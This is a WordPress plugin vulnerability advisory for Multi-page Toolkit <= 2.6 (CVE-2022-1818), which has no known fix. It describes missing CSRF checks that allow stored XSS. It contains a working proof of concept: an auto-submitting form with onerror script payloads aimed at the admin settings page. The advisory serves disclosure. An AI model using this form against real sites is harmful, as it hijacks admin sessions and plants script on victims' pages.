WordPress Plugin Vulnerabilities

Multi-page Toolkit <= 2.6 - Arbitrary Settings Update to Stored XSS via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and lead to Stored Cross-Site Scripting due to the lack of sanitisation and escaping as well

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=TA_multi_toolkit.php" method="POST">
    <input type="text" name="mp1_display_all" value="True">
    <input type="text" name="mp1_display_all_text" value="View All">
    <input type="text" name="mp1_div_align" value="center">
    <input type="text" name="mp1_before" value="">
    <input type="text" name="mp1_after" value="">
    <input type="text" name="mp1_previouspagelink" value="«">
    <input type="text" name="mp1_nextpagelink" value="»">
    <input type="text" name="mp1_firstpagetext" value='On First Page"><img src onerror=alert(/XSS1/)>'>
    <input type="text" name="mp1_lastpagetext" value="On Last Page">
    <input type="text" name="mp1_quick_type" value="1">
    <input type="text" name="mp1_nav_type" value="2">
    <input type="text" name="mp1_nav_number" value="True">
    <input type="text" name="mp1_title_number" value="2">
    <input type="text" name="mp2_display_all" value="True">
    <input type="text" name="mp2_display_all_text" value="ALL">
    <input type="text" name="mp2_div_align" value="center">
    <input type="text" name="mp2_before" value="Page :">
    <input type="text" name="mp2_after" value="">
    <input type="text" name="mp2_previouspagelink" value="«">
    <input type="text" name="mp2_nextpagelink" value="»">
    <input type="text" name="mp2_firstpagetext" value="On First Page">
    <input type="text" name="mp2_lastpagetext" value="On Last Page">
    <input type="text" name="mp2_quick_type" value="2">
    <input type="text" name="mp2_nav_type" value="0">
    <input type="text" name="mp2_nav_number" value="True">
    <input type="text" name="mp2_title_number" value="2">
    <input type="text" name="seperator" value="2">
    <input name="seperator_code" value="</textarea>--~~~~~~~~~~~~--<img src onerror=alert(/XSS2/)>">
    <input type="text" name="ta_multipage_Submit" value="Update Options »">
    <input type="text" name="priority" value="99">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
multi-page-toolkit
No known fix

References

CVE
CVE-2022-1818

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
9d6c628f-cdea-481c-a2e5-101dc167718d

Timeline

Publicly Published
2022-05-30 (about 1 years ago)
Added
2022-05-30 (about 1 years ago)
Last Updated
2023-02-24 (about 1 years ago)

Other

Published
Title
Published
2023-05-15
Title
WooCommerce Product Add-ons < 6.2.0 - Cross-Site Request Forgery
Published
2023-05-25
Title
Product Gallery Slider for WooCommerce < 2.2.9 - Cross-Site Request Forgery (CSRF)
Published
2022-11-09
Title
REST API Authentication < 2.4.1 - Settings Update via CSRF
Published
2023-12-28
Title
Product Enquiry for WooCommerce < 3.1 - Arbitrary Enquiry Deletion via CSRF
Published
2022-07-28
Title
ЮKassa для WooCommerce < 2.3.1 - Arbitrary Settings Update via CSRF